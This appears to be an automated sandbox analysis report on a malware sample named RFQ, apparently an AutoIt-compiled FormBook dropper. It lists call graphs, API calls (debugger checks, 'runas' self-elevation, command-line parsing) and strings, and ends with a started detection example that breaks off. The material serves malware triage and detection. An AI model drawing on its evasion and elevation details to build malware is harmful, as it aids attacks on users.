moneypunct 87012 40f850 86946->87012 86951 427c2a 87041 414d04 86951->87041 86953 40f7fc 86953->86951 86954 40f804 86953->86954 87028 414a46 86954->87028 86958 40f80e 86958->86882 86963 4528bd 86958->86963 86960 427c59 87047 414fe2 86960->87047 86962 427c79 86964 4150d1 _fseek 81 API calls 86963->86964 86965 452930 86964->86965 87547 452719 86965->87547 86968 452948 86968->86884 86969 414d04 __fread_nolock 61 API calls 86970 452966 86969->86970 86971 414d04 __fread_nolock 61 API calls 86970->86971 86972 452976 86971->86972 86973 414d04 __fread_nolock 61 API calls 86972->86973 86974 45298f 86973->86974 86975 414d04 __fread_nolock 61 API calls 86974->86975 86976 4529aa 86975->86976 86977 4150d1 _fseek 81 API calls 86976->86977 86978 4529c4 86977->86978 86979 4135bb _malloc 46 API calls 86978->86979 86980 4529cf 86979->86980 86981 4135bb _malloc 46 API calls 86980->86981 86982 4529db 86981->86982 86983 414d04 __fread_nolock 61 API calls 86982->86983 86984 4529ec 86983->86984 86985 44afef GetSystemTimeAsFileTime 86984->86985 86986 452a00 86985->86986 86987 452a36 86986->86987 86988 452a13 86986->86988 86990 452aa5 86987->86990 86991 452a3c 86987->86991 86989 413748 _free 46 API calls 86988->86989 86993 452a1c 86989->86993 86992 413748 _free 46 API calls 86990->86992 87553 44b1a9 86991->87553 86995 452aa3 86992->86995 86996 413748 _free 46 API calls 86993->86996 86995->86884 86998 452a25 86996->86998 86997 452a9d 86999 413748 _free 46 API calls 86997->86999 86998->86884 86999->86995 87001 431e64 87000->87001 87002 431e6a 87000->87002 87003 414a46 __fcloseall 82 API calls 87001->87003 87002->86885 87003->87002 87005 425de2 87004->87005 87006 40f6fc _wcslen 87004->87006 87005->86946 87007 40f710 WideCharToMultiByte 87006->87007 87008 40f756 87007->87008 87009 40f728 87007->87009 87008->86946 87010 4115d7 52 API calls 87009->87010 87011 40f735 WideCharToMultiByte 87010->87011 87011->86946 87014 40f85d setSBCS _strlen 87012->87014 87015 40f7ab 87014->87015 87060 414db8 
87014->87060 87016 4149c2 87015->87016 87075 414904 87016->87075 87018 40f7e9 87018->86951 87019 40f5c0 87018->87019 87023 40f5cd _strcat __write_nolock _memmove 87019->87023 87020 414d04 __fread_nolock 61 API calls 87020->87023 87021 40f691 __tzset_nolock 87021->86953 87023->87020 87023->87021 87025 425d11 87023->87025 87163 4150d1 87023->87163 87024 4150d1 _fseek 81 API calls 87026 425d33 87024->87026 87025->87024 87027 414d04 __fread_nolock 61 API calls 87026->87027 87027->87021 87029 414a52 __wfsopen 87028->87029 87030 414a64 87029->87030 87031 414a79 87029->87031 87303 417f77 46 API calls __getptd_noexit 87030->87303 87034 415471 __lock_file 47 API calls 87031->87034 87039 414a74 __wfsopen 87031->87039 87033 414a69 87304 417f25 10 API calls __wfsopen 87033->87304 87036 414a92 87034->87036 87287 4149d9 87036->87287 87039->86958 87372 414c76 87041->87372 87043 414d1c 87044 44afef 87043->87044 87540 442c5a 87044->87540 87046 44b00d 87046->86960 87048 414fee __wfsopen 87047->87048 87049 414ffa 87048->87049 87050 41500f 87048->87050 87544 417f77 46 API calls __getptd_noexit 87049->87544 87052 415471 __lock_file 47 API calls 87050->87052 87054 415017 87052->87054 87053 414fff 87545 417f25 10 API calls __wfsopen 87053->87545 87056 414e4e __ftell_nolock 51 API calls 87054->87056 87057 415024 87056->87057 87546 41503d LeaveCriticalSection LeaveCriticalSection _fseek 87057->87546 87059 41500a __wfsopen 87059->86962 87061 414dd6 87060->87061 87062 414deb 87060->87062 87071 417f77 46 API calls __getptd_noexit 87061->87071 87062->87061 87064 414df2 87062->87064 87073 41b91b 79 API calls 11 library calls 87064->87073 87065 414ddb 87072 417f25 10 API calls __wfsopen 87065->87072 87068 414e18 87069 414de6 87068->87069 87074 418f98 77 API calls 7 library calls 87068->87074 87069->87014 87071->87065 87072->87069 87073->87068 87074->87069 87078 414910 __wfsopen 87075->87078 87076 414923 87131 417f77 46 API calls __getptd_noexit 87076->87131 87078->87076 87080 414951 87078->87080 
87079 414928 87132 417f25 10 API calls __wfsopen 87079->87132 87094 41d4d1 87080->87094 87083 414956 87084 41496a 87083->87084 87085 41495d 87083->87085 87087 414992 87084->87087 87088 414972 87084->87088 87133 417f77 46 API calls __getptd_noexit 87085->87133 87111 41d218 87087->87111 87134 417f77 46 API calls __getptd_noexit 87088->87134 87089 414933 __wfsopen @_EH4_CallFilterFunc@8 87089->87018 87095 41d4dd __wfsopen 87094->87095 87096 4182cb __lock 46 API calls 87095->87096 87097 41d4eb 87096->87097 87098 41d567 87097->87098 87106 418209 __mtinitlocknum 46 API calls 87097->87106 87109 41d560 87097->87109 87139 4154b2 47 API calls __lock 87097->87139 87140 415520 LeaveCriticalSection LeaveCriticalSection _doexit 87097->87140 87100 416b04 __malloc_crt 46 API calls 87098->87100 87101 41d56e 87100->87101 87103 41d57c InitializeCriticalSectionAndSpinCount 87101->87103 87101->87109 87102 41d5f0 __wfsopen 87102->87083 87104 41d59c 87103->87104 87105 41d5af EnterCriticalSection 87103->87105 87108 413748 _free 46 API calls 87104->87108 87105->87109 87106->87097 87108->87109 87136 41d5fb 87109->87136 87112 41d23a 87111->87112 87113 41d255 87112->87113 87125 41d26c __wopenfile 87112->87125 87145 417f77 46 API calls __getptd_noexit 87113->87145 87115 41d421 87118 41d47a 87115->87118 87119 41d48c 87115->87119 87116 41d25a 87146 417f25 10 API calls __wfsopen 87116->87146 87150 417f77 46 API calls __getptd_noexit 87118->87150 87142 422bf9 87119->87142 87122 41499d 87135 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 87122->87135 87123 41d47f 87151 417f25 10 API calls __wfsopen 87123->87151 87125->87115 87125->87118 87125->87125 87147 41341f 58 API calls 2 library calls 87125->87147 87127 41d41a 87127->87115 87148 41341f 58 API calls 2 library calls 87127->87148 87129 41d439 87129->87115 87149 41341f 58 API calls 2 library calls 87129->87149 87131->87079 87132->87089 87133->87089 87134->87089 87135->87089 87141 4181f2 LeaveCriticalSection 87136->87141 87138 41d602 
87138->87102 87139->87097 87140->87097 87141->87138 87152 422b35 87142->87152 87144 422c14 87144->87122 87145->87116 87146->87122 87147->87127 87148->87129 87149->87115 87150->87123 87151->87122 87155 422b41 __wfsopen 87152->87155 87153 422b54 87154 417f77 __wfsopen 46 API calls 87153->87154 87156 422b59 87154->87156 87155->87153 87157 422b8a 87155->87157 87158 417f25 __wfsopen 10 API calls 87156->87158 87159 422400 __tsopen_nolock 109 API calls 87157->87159 87162 422b63 __wfsopen 87158->87162 87160 422ba4 87159->87160 87161 422bcb __wsopen_helper LeaveCriticalSection 87160->87161 87161->87162 87162->87144 87165 4150dd __wfsopen 87163->87165 87164 4150e9 87194 417f77 46 API calls __getptd_noexit 87164->87194 87165->87164 87166 41510f 87165->87166 87176 415471 87166->87176 87169 4150ee 87195 417f25 10 API calls __wfsopen 87169->87195 87175 4150f9 __wfsopen 87175->87023 87177 415483 87176->87177 87178 4154a5 EnterCriticalSection 87176->87178 87177->87178 87180 41548b 87177->87180 87179 415117 87178->87179 87182 415047 87179->87182 87181 4182cb __lock 46 API calls 87180->87181 87181->87179 87183 415067 87182->87183 87184 415057 87182->87184 87189 415079 87183->87189 87197 414e4e 87183->87197 87252 417f77 46 API calls __getptd_noexit 87184->87252 87188 41505c 87196 415143 LeaveCriticalSection LeaveCriticalSection _fseek 87188->87196 87214 41443c 87189->87214 87192 4150b9 87227 41e1f4 87192->87227 87194->87169 87195->87175 87196->87175 87198 414e61 87197->87198 87199 414e79 87197->87199 87253 417f77 46 API calls __getptd_noexit 87198->87253 87200 414139 __filbuf 46 API calls 87199->87200 87202 414e80 87200->87202 87205 41e1f4 __write 51 API calls 87202->87205 87203 414e66 87254 417f25 10 API calls __wfsopen 87203->87254 87206 414e97 87205->87206 87207 414f09 87206->87207 87209 414ec9 87206->87209 87213 414e71 87206->87213 87255 417f77 46 API calls __getptd_noexit 87207->87255 87210 41e1f4 __write 51 API calls 87209->87210 87209->87213 87211 414f64 87210->87211 87212 
41e1f4 __write 51 API calls 87211->87212 87211->87213 87212->87213 87213->87189 87215 414455 87214->87215 87216 414477 87214->87216 87215->87216 87217 414139 __filbuf 46 API calls 87215->87217 87220 414139 87216->87220 87218 414470 87217->87218 87256 41b7b2 77 API calls 5 library calls 87218->87256 87221 414145 87220->87221 87222 41415a 87220->87222 87257 417f77 46 API calls __getptd_noexit 87221->87257 87222->87192 87224 41414a 87258 417f25 10 API calls __wfsopen 87224->87258 87226 414155 87226->87192 87228 41e200 __wfsopen 87227->87228 87229 41e223 87228->87229 87230 41e208 87228->87230 87232 41e22f 87229->87232 87235 41e269 87229->87235 87279 417f8a 46 API calls __getptd_noexit 87230->87279 87281 417f8a 46 API calls __getptd_noexit 87232->87281 87233 41e20d 87280 417f77 46 API calls __getptd_noexit 87233->87280 87259 41ae56 87235->87259 87237 41e234 87282 417f77 46 API calls __getptd_noexit 87237->87282 87240 41e26f 87242 41e291 87240->87242 87243 41e27d 87240->87243 87241 41e23c 87283 417f25 10 API calls __wfsopen 87241->87283 87284 417f77 46 API calls __getptd_noexit 87242->87284 87269 41e17f 87243->87269 87245 41e215 __wfsopen 87245->87188 87248 41e289 87286 41e2c0 LeaveCriticalSection __unlock_fhandle 87248->87286 87249 41e296 87285 417f8a 46 API calls __getptd_noexit 87249->87285 87252->87188 87253->87203 87254->87213 87255->87213 87256->87216 87257->87224 87258->87226 87260 41ae62 __wfsopen 87259->87260 87261 41aebc 87260->87261 87262 4182cb __lock 46 API calls 87260->87262 87263 41aec1 EnterCriticalSection 87261->87263 87264 41aede __wfsopen 87261->87264 87265 41ae8e 87262->87265 87263->87264 87264->87240 87266 41aeaa 87265->87266 87267 41ae97 InitializeCriticalSectionAndSpinCount 87265->87267 87268 41aeec ___lock_fhandle LeaveCriticalSection 87266->87268 87267->87266 87268->87261 87270 41aded __chsize_nolock 46 API calls 87269->87270 87271 41e18e 87270->87271 87272 41e1a4 SetFilePointer 87271->87272 87273 41e194 87271->87273 87275 41e1bb GetLastError 
87272->87275 87276 41e1c3 87272->87276 87274 417f77 __wfsopen 46 API calls 87273->87274 87277 41e199 87274->87277 87275->87276 87276->87277 87278 417f9d __dosmaperr 46 API calls 87276->87278 87277->87248 87278->87277 87279->87233 87280->87245 87281->87237 87282->87241 87283->87245 87284->87249 87285->87248 87286->87245 87288 4149ea 87287->87288 87289 4149fe 87287->87289 87333 417f77 46 API calls __getptd_noexit 87288->87333 87291 4149fa 87289->87291 87293 41443c __flush 77 API calls 87289->87293 87305 414ab2 LeaveCriticalSection LeaveCriticalSection _fseek 87291->87305 87292 4149ef 87334 417f25 10 API calls __wfsopen 87292->87334 87295 414a0a 87293->87295 87306 41d8c2 87295->87306 87298 414139 __filbuf 46 API calls 87299 414a18 87298->87299 87310 41d7fe 87299->87310 87301 414a1e 87301->87291 87302 413748 _free 46 API calls 87301->87302 87302->87291 87303->87033 87304->87039 87305->87039 87307 414a12 87306->87307 87308 41d8d2 87306->87308 87307->87298 87308->87307 87309 413748 _free 46 API calls 87308->87309 87309->87307 87311 41d80a __wfsopen 87310->87311 87312 41d812 87311->87312 87313 41d82d 87311->87313 87350 417f8a 46 API calls __getptd_noexit 87312->87350 87315 41d839 87313->87315 87318 41d873 87313->87318 87352 417f8a 46 API calls __getptd_noexit 87315->87352 87316 41d817 87351 417f77 46 API calls __getptd_noexit 87316->87351 87321 41ae56 ___lock_fhandle 48 API calls 87318->87321 87320 41d83e 87353 417f77 46 API calls __getptd_noexit 87320->87353 87323 41d879 87321->87323 87325 41d893 87323->87325 87326 41d887 87323->87326 87324 41d846 87354 417f25 10 API calls __wfsopen 87324->87354 87355 417f77 46 API calls __getptd_noexit 87325->87355 87335 41d762 87326->87335 87330 41d81f __wfsopen 87330->87301 87331 41d88d 87356 41d8ba LeaveCriticalSection __unlock_fhandle 87331->87356 87333->87292 87334->87291 87357 41aded 87335->87357 87337 41d772 87338 41d7c8 87337->87338 87340 41d7a6 87337->87340 87342 41aded __chsize_nolock 46 API calls 87337->87342 87370 41ad67 47 
[Control-flow graph edge data: node ids, function addresses and API-call counts rendered from the report's interactive graph viewer; only the graph structure survives here, with no additional API or address information beyond what the APIs list below records.]

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 0040D5AA
  • Part of subcall function 00401F20: GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402007
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 0040201D
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402033
  • Part of subcall function 00401F20: __wcsicoll.LIBCMT ref: 00402049
  • Part of subcall function 00401F20: _wcscpy.LIBCMT ref: 0040207C
• IsDebuggerPresent.KERNEL32 ref: 0040D5B6
• GetFullPathNameW.KERNEL32(004A7F6C,00000104,?,004A7F50,004A7F54), ref: 0040D625
  • Part of subcall function 00401460: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 004014A5
• SetCurrentDirectoryW.KERNEL32(?,00000001), ref: 0040D699
• MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,00484C92,00000010), ref: 0042E1C9
• SetCurrentDirectoryW.KERNEL32(?), ref: 0042E238
• GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0042E268
• GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 0042E2B2
• ShellExecuteW.SHELL32(00000000), ref: 0042E2B9
  • Part of subcall function 00410390: GetSysColorBrush.USER32(0000000F), ref: 0041039B
  • Part of subcall function 00410390: LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
  • Part of subcall function 00410390: LoadIconW.USER32(?,00000063), ref: 004103C0
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A4), ref: 004103D3
  • Part of subcall function 00410390: LoadIconW.USER32(?,000000A2), ref: 004103E6
  • Part of subcall function 00410390: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                            • Part of subcall function 00410390: RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                                                                            • Part of subcall function 00410570: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105E4
                                                                            • Part of subcall function 00410570: ShowWindow.USER32(?,00000000), ref: 004105EE
                                                                            • Part of subcall function 0040E0C0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E1A7
                                                                          Strings
                                                                          • runas, xrefs: 0042E2AD, 0042E2DC
                                                                          • This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support., xrefs: 0042E1C2
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcscpy
                                                                          • String ID: This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                          • API String ID: 2495805114-3383388033
                                                                          • Opcode ID: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction ID: d8104b1e62918721d1641daf81013a976a0e8d4b3b5b72af0edf1e1af392be53
                                                                          • Opcode Fuzzy Hash: e8c9047fb359c29ec9f900fe27c3aa55fa0c8583f95d62b388df9f145cb8bf6e
                                                                          • Instruction Fuzzy Hash: A3513B71A48201AFD710B7E1AC45BEE3B689B59714F4049BFF905672D2CBBC4A88C72D

                                                                          Control-flow Graph

                                                                          control_flow_graph of 0040E500 (legend: Executed / Not Executed; node list omitted): blocks 40e500-40e65d with cold paths at 427625-4276df; calls 40bc70, GetVersionExW, 402160, 40e660, 40e680, 40ef60, GetCurrentProcess, 40ef20, GetSystemInfo (4276c6, 4276d5), 40efd0, 40ef90, GetNativeSystemInfo, FreeLibrary (40e641, 40e653)
                                                                          APIs
                                                                          • GetVersionExW.KERNEL32(?), ref: 0040E52A
                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                          • GetCurrentProcess.KERNEL32(?), ref: 0040E5D4
                                                                          • GetNativeSystemInfo.KERNELBASE(?), ref: 0040E632
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E642
                                                                          • FreeLibrary.KERNEL32(?), ref: 0040E654
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                          • String ID: 0SH
                                                                          • API String ID: 3363477735-851180471
                                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                          • API String ID: 2574300362-3542929980
                                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                          • API String ID: 1762048999-758534266
                                                                          • Opcode ID: 230208aa29ab6d04e6d17a77ab66c18202fa9fbe0bb8c521ee9ec5454df47b9a
                                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                          • Opcode Fuzzy Hash: 230208aa29ab6d04e6d17a77ab66c18202fa9fbe0bb8c521ee9ec5454df47b9a
                                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                          • API String ID: 3948761352-1609664196
                                                                          • Opcode ID: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                          • Opcode Fuzzy Hash: de7630e39462d0d30620e5d386b824db2ab2692deedf796b652438eb031e1025
                                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • _wcscat.LIBCMT ref: 00427541
                                                                          • _wcslen.LIBCMT ref: 00427551
                                                                          • _wcslen.LIBCMT ref: 00427562
                                                                          • _wcscat.LIBCMT ref: 0042757C
                                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.1283754821.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.1283737685.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283809209.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283827385.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283846379.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283864919.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000001.00000002.1283901582.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_RFQ.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                          • String ID: Include$\
                                                                          • API String ID: 3173733714-3429789819
                                                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
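The three routines above together identify the binary as a stock AutoIt runtime stub rather than the FormBook payload itself: the startup routine checks IsDebuggerPresent, shows the MessageBoxA text addressed to AV researchers and relaunches itself through ShellExecuteW with the "runas" verb; the command-line parser compares against /AutoIt3ExecuteScript, /AutoIt3ExecuteLine and /AutoIt3OutputDebug; and the include-path builder reads HKEY_CURRENT_USER\Software\AutoIt v3\AutoIt. A static triage check for these markers, as an added example that is not Joe Sandbox, AutoIt or sample code: it scans a raw image for the strings in the encoding the listed API expects (ASCII for MessageBoxA, UTF-16LE for the ...W APIs and the __wcsicoll comparisons). The marker names, weights, the threshold and the constructed sample bytes are assumptions for this example; the strings and their encodings are those shown in the report.

```python
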